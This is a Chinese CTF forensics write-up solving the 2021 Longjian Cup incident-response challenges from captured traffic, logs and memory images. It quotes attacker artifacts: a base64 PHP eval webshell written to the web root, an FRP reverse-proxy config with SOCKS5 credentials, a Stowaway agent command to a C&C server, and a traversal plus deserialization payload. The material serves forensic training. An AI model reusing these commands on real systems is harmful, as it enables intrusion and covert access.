應急響應-2021隴劍杯WP詳解
為了準備御網杯的應急響應,于是將早有耳聞的隴劍杯復現練習練習,不得不說隴劍杯的題目質量相當的好
2021隴劍杯WP詳解
本次復現附件來自于DIDCTF,有興趣的話,大家也可以去該平臺獲取附件進行練習
JWT
jwt1
昨天,單位流量系統捕獲了?客攻擊流量,請您分析流量后進?回答:
該?站使?了( )認證方式?(如有字母則默認小寫)
注意:此附件適用于jwt所有系列
根據題目即可知道是jwt認證
jwt2
黑客繞過驗證使用的jwt中,id和username是___。(中間使用#號隔開,例如1#admin)
查找username
jwt3
黑客獲取webshell之后,權限是___?(字母默認小寫)
黑客查看自己的權限會使用whoami,搜索whoami后查看響應即可
jwt4
黑客上傳的惡意文件文件名是___。(請提交帶有文件后綴的文件名,例如x.txt)
直接追蹤上一題的流量,直接就能看見惡意文件為1.c
jwt5
黑客在服務器上編譯的惡意so文件,文件名是___。(請提交帶有文件后綴的文件名,例如x.so)
32條流,不多直接按個查看就行,翻了幾個找到對so文件的操作:looter.so
jwt6
黑客在服務器上修改了一個配置文件,文件的絕對路徑為___。(請確認絕對路徑后再提交)
繼續跟蹤發現,將惡意so文件放入另一個位置:/etc/pam.d/common-auth
Webshel
Webshell-1
黑客登陸系統使用的密碼是__
可以用下邊語句進行過濾
http.request.method == "POST" && http contains "login"
也直接搜索password
Webshell-2
黑客修改了一個日志文件,文件的絕對路徑為__
答題格式:/xx/xxx/xxx/xxx.log
不區分大小寫
過濾POST請求,查看請求信息
http.request.method==POST
前幾條能夠看見Form item: "tpl" = "data/Runtime/Logs/Home/21_08_07.log"
但這是相對路徑
繼續跟進查看
寫入木馬文件
system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > /var/www/html/1.php');
分析可得絕對路徑為:
/var/www/html/data/Runtime/Logs/Home/21_08_07.log
Webshell-3
黑客獲取webshell之后的權限是:
先前查看時,發現執行了whoami命令
追蹤流看到為www-data
日志錯誤信息顯示:
ERR: ...............:./Application/Home/View/default/www-data
其中www-data即為whoami命令的執行結果,表明當前 Web 服務以www-data用戶運行。
Webshell-4
黑客寫入的webshell文件名是__。(請提交帶有文件后綴的文件名,例如x.txt)
前邊已經看見木馬文件1.php
Webshell-5
黑客上傳的代理工具客戶端名字是__。
(如有字母請全部使用小寫) 僅文件名,不要后綴名
追蹤流發現frpc.ini
FRP 工具確認
frpc是 FRP(Fast Reverse Proxy)的客戶端組件,用于實現內網穿透。.ini文件通常作為 FRP 的配置文件,包含服務器地址、端口、代理規則等信息。- 在滲透測試或攻擊場景中,攻擊者常上傳 FRP 客戶端以建立反向代理,突破內網限制。
故為 frpc
補充
下邊是對webshell工具的流量特征分析
流量分析——菜刀、蟻劍、冰蝎、天蝎、哥斯拉 - sgthlg - 博客園
簡述一下蟻劍的特征:
- 選擇不同編碼器的數據形式
默認:@ini_set("display_errors", "0");@set_time_limit(0);
- 響應包格式由隨機數作為定界符包裹結果
- 若使用了加密等插件繞過的話,加密后的數據沒用什么特別明顯的了,但是蟻劍混淆加密后還有一個比較明顯的特征,參數大多以“_0x.....=”這種形式,以_0x開頭的參數名,這個可能也可以換其他的固定字符,可以找出規律。
Webshell-6
黑客代理工具的回連服務端ip是_。
在上一條流,即在流38中發現一串十六進制代碼,這是蟻劍特征的數據流 ,將=號后面的內容進行base16解碼
解碼后即可看見回連IP
實際攻擊行為分析
- 文件操作
- 目標文件:
frpc.ini(FRP 客戶端配置文件)。 - 操作類型:通過
fwrite(fopen($f, "a"), $buf)追加內容到文件中,實現配置文件的修改或創建。
- 內網穿透工具部署
-
FRP 配置內容
[common] server_addr = 192.168.239.123 server_port = 7778 token=Xa3BJf2l5enmN6Z7A8mv [test_socks5] type = tcp remote_port = 8111 plugin = socks5 plugin_user = 0HDFt16cLQJ plugin_passwd = JTN276Gp use_encryption = true use_compression = true -
功能:建立 SOCKS5 代理,將內網 8111 端口轉發到遠程服務器
192.168.239.123:7778,用于橫向移動。
Webshell-7
黑客的socks5的連接賬號、密碼是__。(中間使用#號隔開,例如admin#passwd)
根據上述分析可以得知為:0HDFt16cLQJ#JTN276Gp
日志分析
日志分析-1
題目描述
單位某應用程序被攻擊,請分析日志,進行作答:
網絡存在源碼泄漏,源碼文件名是__
注意:此附件適用于日志分析所有題目
分析access.log文件,查找返回為200的請求
發現WWW.zip泄露
日志分析-2
分析攻擊流量,黑客往/tmp目錄寫入一個文件,
文件名為___。
查找tmp
分析目錄可知,文件名為sess_car
日志分析-3
分析攻擊流量,黑客使用的是__類讀取了秘密文件。
上一題中寫入的文件就是執行了讀操作
172.17.0.1 - - [07/Aug/2021:01:38:20 +0000] "GET /?filename=../../../../../../../../../../../../../../../../../tmp/sess_car&content=func|N;files|a:2:{s:8:"filename";s:16:"./files/filename";s:20:"call_user_func_array";s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:"SplFileObject";} HTTP/1.1" 302 879 "-" "python-requests/2.26.0"
分析該日志可知,這是一個典型的 PHP 序列化字符串,利用SplFileObject類讀取/flag文件
故為:SplFileObject
簡單日志分析-1
題目描述
某應用程序被攻擊,請分析日志后作答:
黑客攻擊的參數是___。(如有字母請全部使用小寫)
注意:此附件適用于簡單日志分析所有題目,后綴名為.zip
目測是GET請求,查找問號
看到訪問的參數
簡單日志分析-2
黑客查看的秘密文件的絕對路徑是___。(不帶 / )
先前參數就是執行命令的
將參數解碼后即可看見,執行的命令,包括讀取文件操作
簡單日志分析-3
黑客反彈shell的ip和端口是___。(格式使用“ip:端口",例如127.0.0.1:2333)
同理,將第三個進行解碼即可獲取反彈shell信息
sql注入
sql1
題目描述
某應用程序被攻擊,請分析日志后作答:
黑客在注入過程中采用的注入手法叫___。(格式為4個漢字,例如“拼搏努力”)
注意:此附件適用于SQL注入所有題目
盲猜也能猜到是布爾盲注
簡單分析流量也可看出
sql2
黑客在注入過程中,最終獲取flag的數據庫名、表名和字段名是___。(格式為“數據庫名#表名#字段名”,例如database#table#column)
根據最后爆破flag可看出數據庫的相關信息
sql3(bool)
黑客最后獲取到的flag字符串為__。
使用nodepad手動分析,或者寫腳本都可以獲取盲注結果
IOS
ios1
題目描述
一位ios的安全研究員在家中使用手機聯網被黑,不僅被竊密還丟失比特幣若干,請你通過流量和日志分析后作答:
黑客所控制的C&C服務器IP是___。
C&C 服務器(Command & Control Server,命令與控制服務器) 是黑客用于遠程控制被控設備(如僵尸網絡、惡意軟件感染的主機)的核心基礎設施。黑客通過 C&C 服務器向被控設備發送指令、接收數據,實現竊取信息、勒索攻擊、分布式拒絕服務(DDoS)等惡意行為。獲取 C&C 服務器 IP 是網絡安全事件響應、溯源追蹤的關鍵步驟。
導出對象分析,倒著查看object發現似乎是按順序產生的
依次打開后邊幾個,找到C&C服務器IP
./ios_agent -c 3.128.156.159:8081 -s hack4sec
ip為3.128.156.159
ios2
黑客利用的Github開源項目的名字是___。(如有字母請全部使用小寫)
搜索github,接著追蹤流
根據github域名可知,項目名為:Stowaway
作者名 ph4ntonn 項目名 Stowaway 軟件名 ios_agent
ios3
通訊加密密鑰的明文是___。
訪問github項目,查看使用方法
在命令 ./ios_agent -c 3.128.156.159:8081 -s hack4sec 中:
-c參數用于指定 C&C 服務器的地址和端口,即連接到3.128.156.159:8081;-s參數用于指定 通信加密密鑰,其明文為hack4sec。
可知秘鑰明文為hack4sec
ios4(bool)
黑客通過SQL盲注拿到了一個敏感數據,內容是___。
協議分級可知,傳輸層全為 TCP ,應用層經 TLS 加密,以 HTTP/2 承載業務
按照http2過濾后進行篩選
找到盲注語句
用作過濾器,由于查詢是GET請求,在ip查詢基礎上再加上請求方式
ip.addr eq 192.168.1.8 and ip.addr eq 192.168.1.12&&http2.headers.method == "GET"
導出后,notepad進行url解碼
每次都是從2B開始,找到下一個開始的前一條語句中的字符即為結果,但是還沒有很好的辦法去搜集
ios5
黑客端口掃描的掃描器的掃描范圍是__。(格式使用“開始端口-結束端口”,例如1-65535)
掃描端口分析過程
- 端口掃描原理
黑客通過向目標主機的連續端口發送 TCP/UDP 請求,并根據響應判斷端口是否開放。常見的掃描方式包括:- TCP SYN 掃描:發送 SYN 包,根據 SYN+ACK(開放)或 RST(關閉)響應判斷端口狀態。
- TCP Connect 掃描:完整建立 TCP 連接(三次握手),若成功則端口開放,失敗則返回 RST 包。
- RST 報文的關鍵作用
當掃描器向關閉的端口發送請求時,目標主機會返回RST(復位)報文以終止連接。通過捕獲這些 RST 報文,可反向推斷掃描器嘗試訪問的端口范圍。- 專家信息中的 RST:Wireshark 的 “專家信息” 功能會匯總異常流量,包括頻繁的 RST 報文。若發現大量 RST 且目標端口連續,即可確定掃描范圍。
- 掃描范圍的確定
日志中雖未直接給出端口號,但結合安全實踐,黑客通常會進行全端口掃描(1-65535) 以發現潛在漏洞(如 SSH 22、HTTP 80、RDP 3389 等)。此外,Wireshark 專家信息中的 RST 報文若顯示連續的端口號(如 20-443),則可直接推斷掃描范圍。
由于是端口掃描,所以會涉及到rst報文和連續端口訪問
分析--》專家信息--》RST--》查找連續端口以確定范圍
分析連續端口可知,范圍是10-499
ios6
黑客訪問/攻擊了內網的幾個服務器,IP地址為__。(多個IP之間按從小到大排序,使用#來分隔,例如127.0.0.1#192.168.0.1)
先前的bool盲注訪問的ip是192.168.1.12
在日志中找到兩個ip,只有ip為172.28.0.2能夠找到
ip.addr==172.28.0.2
故結果為: 172.28.0.2#192.168.1.12
ios7
黑客寫入了一個webshell,其密碼為:( )。(如有字母為小寫)
webshell寫入后是需要密碼進行連接的,嘗試使用?進行查找,找到ma.php文件跟著參數
故webshell密碼為 fxxk
內存分析
內存分析-1
題目描述
網管小王制作了一個虛擬機文件,讓您來分析后作答:
虛擬機的密碼是___。(密碼中為flag{xxxx},含有空格,提交時不要去掉)
除了Target.vmem鏡像文件,還有一個提示:
no space but underline
奇怪,題目上答案要求有空格
加載鏡像文件
使用lsadump查看密碼
隱約看見flag信息,但是有多余字符
將00替換為空,轉hex,去掉開頭的H,就是完整flag
其實默認在系統密碼中就有
內存分析-2
虛擬機中有一個某品牌手機的備份文件,文件里的圖片里的字符串為__。(解題過程中需要用到上一題答案中flag內的內容進行處理。本題的格式也是flag{xx},答案含有空格時,空格不要去掉)
進行文件分析,查找 image
看到有一個圖片信息,下載后分析
由于華為手機助手加密的文件解密時需要依賴整個文件夾中的文件,只有一個enc是不行的,還需要另一個exe文件
查找 HUAWEI,找到exe
將exe文件下載下來,當做zip打開
去github找項目恢復文件
GitHub - RealityNet/kobackupdec: Huawei backup decryptor
根據參數要求,題目提示密碼是上一問的flag,并且要把空格換為下劃線,運行腳本進行恢復
python3 kobackupdec.py -vvv W31C0M3_T0_THiS_34SY_F0R3NSiCX "../HUAWEI P40_2021-aa-bb xx.yy.zz" ../result
恢復的結果中有一個壓縮包,打開就是需要的加密圖片
參考wp
完整的wp,但是不太詳細
浙公網安備 33010602011771號